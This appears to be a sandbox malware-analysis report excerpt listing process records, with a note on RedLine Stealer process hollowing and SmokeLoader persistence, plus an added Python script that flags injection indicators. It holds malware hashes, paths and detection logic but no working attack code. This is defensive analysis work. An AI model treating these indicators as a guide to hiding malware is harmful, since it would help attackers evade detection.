                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                General

                                                                                                                                                Start time:14:10:46
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                General

                                                                                                                                                Start time:14:10:46
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                                                                                                                                                Imagebase:0x7ff6225d0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                General

                                                                                                                                                Start time:14:10:50
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                                                                                                                                                Imagebase:0x7ff68b0a0000
                                                                                                                                                File size:2150896 bytes
                                                                                                                                                MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                General

                                                                                                                                                Start time:14:10:57
                                                                                                                                                Start date:29/10/2021
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\bhhudtb
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\bhhudtb
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:212992 bytes
                                                                                                                                                MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language

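The process records above carry the evidence for the "process hollowing" and "injects a PE file into a foreign process" signatures: ServiceModelReg.exe is a signed Microsoft binary loaded at image base 0xae0000, yet every RedLine Yara hit against it comes from a memory dump at 0x402000, i.e. a second PE mapped at the classic 0x400000 default base rather than the on-disk image. The same pattern holds for DF3A.exe (base 0xed0000, hits at 0x402000), and the SmokeLoader persistence copy `bhhudtb` runs out of AppData\Roaming without a file extension. The following script is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this `Key:Value` layout and flags those three indicators. The report excerpt it works on is a constructed subset of the records above; reading the fourth dot-separated field of a `.sdmp` name as the dump's base address, and using "File size" as a stand-in for the image size (SizeOfImage is not in the record), are assumptions made for the example.

```python
"""Triage of sandbox process records (added example, not the report's own tooling).

Flags: Yara hits at addresses outside the process's own image, Yara hits inside
a trusted C:\\Windows\\ binary, and extensionless executables run from Roaming.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the process records in the report above
# (paths, hashes and Yara sources copied from the listing; layout trimmed).
SAMPLE_REPORT = r"""
General
Start time:14:10:31
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Wow64 process (32bit):true
Imagebase:0xae0000
File size:221800 bytes
MD5 hash:FFF587A66B8D5A50A055B9CD6D632BEB
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
General
Start time:14:10:46
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Imagebase:0x7ff6225d0000
File size:2150896 bytes
MD5 hash:C139654B5C1438A95B321BB01AD63EF6
General
Start time:14:10:57
Path:C:\Users\user\AppData\Roaming\bhhudtb
Wow64 process (32bit):true
Imagebase:0x400000
File size:212992 bytes
MD5 hash:73252ACB344040DDC5D9CE78A5D3A4C2
"""


@dataclass
class ProcessRecord:
    fields: dict = field(default_factory=dict)  # "Path" -> "C:\\...", etc.
    yara: list = field(default_factory=list)    # raw "Rule: ..., Source: ..." lines


def parse_process_records(text):
    """Split the report into records at each 'General' header and read Key:Value lines."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "General":
            current = ProcessRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("•"):              # bullet lines are Yara matches
            current.yara.append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")  # split on the FIRST colon only,
        if sep:                                 # so "Path:C:\..." keeps its drive letter
            current.fields[key.strip()] = value.strip()
    return records


def yara_dump_address(match_line):
    """Return the dump base address encoded in the .sdmp name, or None.

    Assumption for this example: in names like
    00000028.00000002.507631653.0000000000402000.00000040.00000001.sdmp
    the fourth dot-separated field is the hexadecimal base address of the dump.
    """
    m = re.search(r"Source:\s*(\S+)\.sdmp", match_line)
    if not m:
        return None
    parts = m.group(1).split(".")
    return int(parts[3], 16) if len(parts) >= 4 else None


def triage(rec):
    """Return the list of indicator names raised by one process record."""
    findings = []
    path = rec.fields.get("Path", "")
    lower = path.lower()
    base = int(rec.fields.get("Imagebase", "0"), 16)
    # SizeOfImage is not in the record; file size is used as an approximation.
    size = int(rec.fields.get("File size", "0 bytes").split()[0])

    for match in rec.yara:
        addr = yara_dump_address(match)
        if addr is not None and (addr < base or addr >= base + size):
            # Malware signature in memory that the on-disk image never occupied:
            # a foreign PE was mapped into this process (hollowing / injection).
            findings.append(f"yara_outside_image:{addr:#x}")
            break
    if rec.yara and lower.startswith("c:\\windows\\"):
        findings.append("trusted_path_hosts_malware_yara")
    if "\\appdata\\roaming\\" in lower and "." not in path.rsplit("\\", 1)[-1]:
        findings.append("extensionless_binary_in_roaming")
    return findings


def triage_report(text):
    """Map each process path to its findings, dropping clean processes."""
    return {r.fields.get("Path", "?"): f for r in parse_process_records(text) if (f := triage(r))}


if __name__ == "__main__":
    for path, findings in triage_report(SAMPLE_REPORT).items():
        print(f"{path}\n    {', '.join(findings)}")
```

Run stand-alone it reports ServiceModelReg.exe twice (foreign code at 0x402000 inside a C:\Windows binary) and `bhhudtb` once, while the Chrome utility process stays clean. The lower-bound check (address below the image base) is exact; the upper bound inherits the file-size approximation and can misfire on images whose SizeOfImage greatly exceeds their file size, so treat it as a triage hint to confirm against the dump list rather than a verdict.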